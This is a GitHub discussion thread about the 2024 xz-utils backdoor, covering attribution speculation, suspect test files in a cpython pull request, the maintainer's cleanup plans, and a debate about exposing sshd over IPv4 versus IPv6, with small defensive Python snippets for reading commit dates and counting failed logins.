Past experience was more of a disclaimer saying I might be wrong, and for sure Linux, bash and gcc work differently. Feel free to understand it as argument of authority if you believe experience 25 years ago on a different OS is what that means.

Also, not sure why you're giving someone adding the compromised unused xz test files into cpython repo more forgiveness than me, when I've disclaimed ahead I'm not expert of the topic and could be wrong.

All Easter spent trying to blame China

Me? Where? Just for the joke, in a previous post I added some facts that suggest there are strong leads to other countries that could be behind it. And that's not even picked up in your claim. Read again and see how I'm making fun of speculating about who is behind the attack.

I don't know who, and I don't think it actually matters who is behind the attack.

Maybe it's important to see what the attack is really targeting. There is strong evidence that parts of the script try to limit it to some architectures.
As noted by some, some parts make no sense, like the previously mentioned checks on $build, which appear not to work given how it's populated with eval.

Sure, x86 is the target, but since other architectures were added in recent years, are these really being exempted, or targeted too? Do all those RISC-specific architecture code changes actually belong in all those tools? Are they supposed to prevent using faulty code on said architecture or not?

Those are legitimate questions. Raising awareness is not accusing a country.

I think it's interesting to remind also some hardware like x86 Intel/AMD have trade bans for some countries actually at war. Maybe in some remote geography that's not that big of a threat. Countries could modify their architecture supply chains to pursue their plans or not.

@AdrianBunk

Could logs from git.tukaani.org give us more detail about the commits, like what IP they came from, the difference between merge time and commit time, etc.? I think GitHub surely has that, but I'm not sure about Lasse's logs; they'd already be a few years old.

No:

https://tukaani.org/xz-backdoor/

Only I have had access to the main tukaani.org website, git.tukaani.org repositories, and related files.

@xry111

xry111 commented Apr 3, 2024

Could logs from git.tukaani.org give us more detail about the commits, like what IP they came from, the difference between merge time and commit time, etc.? I think GitHub surely has that, but I'm not sure about Lasse's logs; they'd already be a few years old.

No:

https://tukaani.org/xz-backdoor/

Only I have had access to the main tukaani.org website, git.tukaani.org repositories, and related files.

Well, I thought GH was the mirror of git.tukaani.org, but it's actually the opposite.

Then maybe MS can find something in GitHub's logs. And maybe we can use the GH API to gather some info when the repo is re-enabled.
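
If the repo does come back, the gap between author time and committer time asked about above could be read from GitHub's commit listing. A minimal sketch, assuming the JSON shape returned by the REST endpoint `GET /repos/{owner}/{repo}/commits`, where each item carries `commit.author.date` and `commit.committer.date` as ISO 8601 strings. The sample payload is made up for illustration (not real xz commits), and `date_gaps` is a hypothetical helper name:

```python
from datetime import datetime


def parse_ts(ts: str) -> datetime:
    # GitHub timestamps look like "2024-01-01T10:00:00Z".
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def date_gaps(commits):
    """Yield (sha, seconds between author date and committer date)."""
    for item in commits:
        authored = parse_ts(item["commit"]["author"]["date"])
        committed = parse_ts(item["commit"]["committer"]["date"])
        yield item["sha"], (committed - authored).total_seconds()


# Made-up sample in the shape of the API response.
sample = [
    {"sha": "aaa111", "commit": {"author": {"date": "2024-01-01T10:00:00Z"},
                                  "committer": {"date": "2024-01-01T10:00:00Z"}}},
    {"sha": "bbb222", "commit": {"author": {"date": "2024-01-01T10:00:00Z"},
                                  "committer": {"date": "2024-01-03T12:30:00Z"}}},
]

for sha, gap in date_gaps(sample):
    print(sha, gap)
```

This only surfaces what Git itself recorded. IP addresses are not part of commit data, so those could only come from server-side logs.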

@Artoria2e5

Artoria2e5 commented Apr 3, 2024

@wibeipummedo says: Saw an interesting commit over in cpython: python/cpython@ea51476

It's part of PR python/cpython#115989

The bytecode there

It's not "bytecode". It's real instructions that you should be able to disassemble.

seem to be .xz test files from the 5.6.1 release.

It happens to be from 5.6.1, but was it added in 5.6.1?

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

It adds bloat, that we are sure of. But as far as the invocation is involved, it is benign and neither runs the code nor triggers the backdoor.

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53)

That's a documentation commit. The most parsimonious explanation would be that Wong, like the unfortunate 1password guy and the... (what's the embedded thing called? anyway, someone went to update the project url and license) guy, is just too excited about new versions. The only difference is that he's got a Sinitic name.

The blog post is also not good proof. Dude sounds like he's new to the codebase, which he might really be!


Re: romanization

Around my part of the world, it's not too rare for online people (including programming people) to dabble in Sinitic romanizations and Sinitic topolects. Sometimes they just get weird ideas about "which romanization is best", about as meaningful as debating which Unicode normalization method is best.

"Ch'ien Wang" is a more normal spelling under Wade-Giles. I think zacanger has gotten it right. The final change to "Wong" is not-Mandarin, but it's kinda justified by being fashionable.

At least we're still mostly dealing with Mandarin.

@zacanger

zacanger commented Apr 3, 2024

@lhmouse

No transliteration scheme for Mandarin

Jyutping (Canto). That does kind of stand out to me, but I'm not a native speaker, I don't know if anyone would usually mix the two.

Around my part of the world, it's not too rare for online people (including programming people) to dabble in Sinitic romanizations and Sinitic topolects. Sometimes they just get weird ideas about "which romanization is best", about as meaningful as debating which Unicode normalization method is best.

@Artoria2e5 thank you for clarifying

@4i8

4i8 commented Apr 3, 2024

If gnu/linux is hackable, then nothing is secure anymore.

@christoofar

christoofar commented Apr 3, 2024

If gnu/linux is hackable, then nothing is secure anymore.

define "secure".

If more users pushed to IPv6-only and raised the expense of scanning the network a lot higher, the giant increase in failed TCP dials would be easier for network carriers to see and deal with.

any vps/cloud provider not giving you a healthy-sized IPv6 range by default, configured and turned on in their bake scripts, is garbage; there is no excuse

cloudflare should demand edges go IPv6-only and not have 80/8080/443 open on IPv4, then sunset allowing edges to have sshd on standard ports

the IPv4 universe is in a fucked state. I don't know why anyone thinks they can deal with serving anything on that network unless they have an incident response center in 5 time zones. I never serve sshd out on it. Moving the port lowers the scan hits quite a bit, IPv6 drops them waaaay down.

I hate this network I wish it would end.

@christoofar

christoofar commented Apr 3, 2024

For those of you who just want a secure way to reach sshd for your admin work, and for whom IPv6 is never happening in the near term, check out Loki or Yggdrasil. Ygg is dead-easy to set up. Your distro probably already has a package for it, or you can build it yourself. You don't need to join it to public Ygg nodes (not joining the public Ygg network automatically creates your own private, encrypted IPv6 network. If any peer in your network is configured to join another Ygg network, that bridges the two networks together).

Within your LAN, if IPv6 multicast works, nodes you add will find each other and link up. It's like OpenVPN but just-add-water. https://yggdrasil-network.github.io

Then you can iptables/ufw whitelist the nodes you're bridging across IPv4 private-public. This step prevents anyone from seeing your Ygg bridge, much less attacking it.

You can also whitelist the hostkeys themselves in yggdrasil.conf to limit what can pair. (if you don't do the keys, then do the iptables)

Once you have that up, you can go into sshd_config on your public server and stop serving on IPv4 completely, or do whatever you need to do to close the port to the Internet.

It also handles the case where your ISP won't even let you host anything---now you can (by setting up Ygg on a vps and going back to your host and adding it as a peer).

@christoofar

christoofar commented Apr 4, 2024

Lasse updated his Plans section and mentions that the Jia code may be going to a git museum repo; he may rebase Jia out of xz, and a clean release could jump to 5.8.0.

Plans
I plan to write an article how the backdoor got into the releases and what can be learned from this. I’m still studying the details.

xz.git needs to be gotten to a state where I’m happy to say I fully approve its contents. It’s possible that the recent commits in master will be rebased to purge the malicious files from the Git history so that people don’t download them in any form when they clone the repo. The old repository could still be preserved in a separate read-only repository for history: the contents of its last commit could equal some commit in the new repository.

These will unfortunately but obviously take several days.

A clean XZ Utils release version could jump to 5.8.0. Some wish that it clearly separates the clean one from the bad 5.6.x.

https://tukaani.org/xz-backdoor/

@christoofar

with libsystemd rolling out the dlopen() change and OpenSSH adding support for systemd notify...
openssh/openssh-portable@08f5792

sad day for Jia.

@christoofar

christoofar commented Apr 4, 2024

The blog post is also not good proof. Dude sounds like he's new to the codebase, which he might really be!

He created a blog and made one post, about his excitement over Jia's optimized memory allocator.

Which is not an optimized memory allocator. 💅

If he was excited about RISCV support going into liblzma, he would have finished the CPython binding changes and written one test that just passes a simple array to liblzma with the feature flags turned on.

If he was performance testing his board for some project, he could have forked CPython to stuff the test bloat in... oh cool, no local tests in his own fork, he shipped all the edits over... and convenience scripts (none in his fork), then called Jia and asked him to pull them down so Jia could pin a launcher from the CPython testbed to see what's going on. Iiiiiiiii dunnnnoooo, I would have left my tests in my fork and cherry-picked out of that branch what I wanted to send to CPython if I had a board in my lap and wanted Jia's change so I could make that supercool, supercompacted whatever.

Just.... think about it.

@rdebath

rdebath commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys.
If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off.
Or just filter your logs another way and snigger at them wasting their time rattling your door.
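
For the "filter your logs another way" option, a minimal sketch that counts failed password attempts per source address. It assumes the usual OpenSSH message `Failed password for [invalid user] NAME from ADDR port N ssh2`; the sample lines use documentation-range addresses and are made up, and `failed_by_ip` is a hypothetical helper name:

```python
import re
from collections import Counter

# Matches e.g. "Failed password for invalid user admin from 203.0.113.7 port 51234 ssh2"
FAILED = re.compile(r"Failed password for (?:invalid user )?\S+ from (\S+) port \d+")


def failed_by_ip(lines):
    """Count failed password attempts per source address."""
    counts = Counter()
    for line in lines:
        match = FAILED.search(line)
        if match:
            counts[match.group(1)] += 1
    return counts


# Made-up log lines for illustration.
sample_log = [
    "sshd[101]: Failed password for invalid user admin from 203.0.113.7 port 51234 ssh2",
    "sshd[102]: Failed password for root from 203.0.113.7 port 51240 ssh2",
    "sshd[103]: Accepted publickey for alice from 198.51.100.2 port 40000 ssh2",
    "sshd[104]: Failed password for root from 2001:db8::5 port 40022 ssh2",
]

for addr, hits in failed_by_ip(sample_log).most_common():
    print(addr, hits)
```

On a real box the lines would come from wherever sshd logs (the journal or an auth log file, depending on the distro).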

@0x1eef

0x1eef commented Apr 4, 2024

@pillowtrucker

... or if you're genuinely a low iq schizophrenic.

There's no need for that, and you don't prove yourself more responsible than Z-nonymous by posting comments like that. Mental illness is not a joke, and shouldn't be used to score cheap points like that. It's not that far from racism, maybe one day you'll realize that.

@duracell

duracell commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys. If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off. Or just filter your logs another way and snigger at them wasting their time rattling your door.

This doesn't help you with a vulnerable ssh version like this exploit or a bug.

@rdebath

rdebath commented Apr 4, 2024

@duracell Nor does being on IPv6. This issue has a lot of hallmarks of being a very long term targeted attack. In that case the attacker knows who they want to attack and likely has a DNS lookup to point at them. If you want to reduce your attack surface, filtering IPs is not really effective.

Reducing the libraries you link is ... for example, don't link the obesity that is systemd. BTW: Don't think I'm trying to assign any blame here; but if you're not using systemd, this is why "libelogind0" exists at all, and that may be a reasonable way to break the attack chain. It's one of the things that gives me a relaxed attitude to this exploit.

These are also the reasons I think this exploit is a failure, it was discovered too soon.
Thank you "Andres Freund".

@bogd

bogd commented Apr 4, 2024

@duracell Nor does being on IPv6.

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

For anyone thinking that IPv6 will solve the issue by just being "too difficult to scan", please think again. I still remember a 2007 presentation by Randy Bush which explains this very well (slide 16).

Add that to what @rdebath already mentioned (this does look like something to be used for targeted attacks, and if you have a target you generally know how to reach it).

@duracell

duracell commented Apr 4, 2024

I never said anything about ipv6, I only said fail2ban and brute-force protection will not help with such exploits.

But to say something about this, here is my point:
Your general anti-“too difficult to scan” message is bs.
Slide 16 says:

  • It is true that address space scanning will be somewhat harder
  • Ha Ha, think botnet scanning and a black market in hot space

1. It says “harder”!
2. 17 YEARS have gone by, and where is the proof of the 2nd point?

And this is just a presentation.
You should look at the current state of public scanning, or even the papers from Akamai.
The truth is: scanning is a lot, lot harder, and for the whole space nearly impossible for a single person or even a normal-sized group without a lot of money. Regular scanning even more so.
Of course, if it's a targeted attack that uses publicly known IP addresses, then it's not that much harder than IPv4. But for exploits in general, widespread IPv6 can help slow down mass attacks.
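
To put rough numbers on "a lot, lot harder": a back-of-the-envelope sketch of a blind sweep, assuming a single scanner sending one million probes per second. The rate is an assumption picked for illustration, not a measurement, and `sweep_seconds` is a hypothetical helper name:

```python
SECONDS_PER_YEAR = 365.25 * 24 * 3600


def sweep_seconds(address_bits: int, probes_per_second: float) -> float:
    """Time to probe every address in a space of 2**address_bits addresses."""
    return 2 ** address_bits / probes_per_second


RATE = 1_000_000  # assumed probes per second

ipv4_minutes = sweep_seconds(32, RATE) / 60                  # the whole IPv4 space
ipv6_subnet_years = sweep_seconds(64, RATE) / SECONDS_PER_YEAR  # one IPv6 /64

print(f"all of IPv4: about {ipv4_minutes:.0f} minutes")
print(f"one IPv6 /64: about {ipv6_subnet_years:,.0f} years")
```

At that rate the whole IPv4 space takes a bit over an hour, while a single /64 takes on the order of 580,000 years. That only covers blind sweeps; it says nothing about hosts whose addresses are already known from DNS or other leaks, which is the targeted case discussed above.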
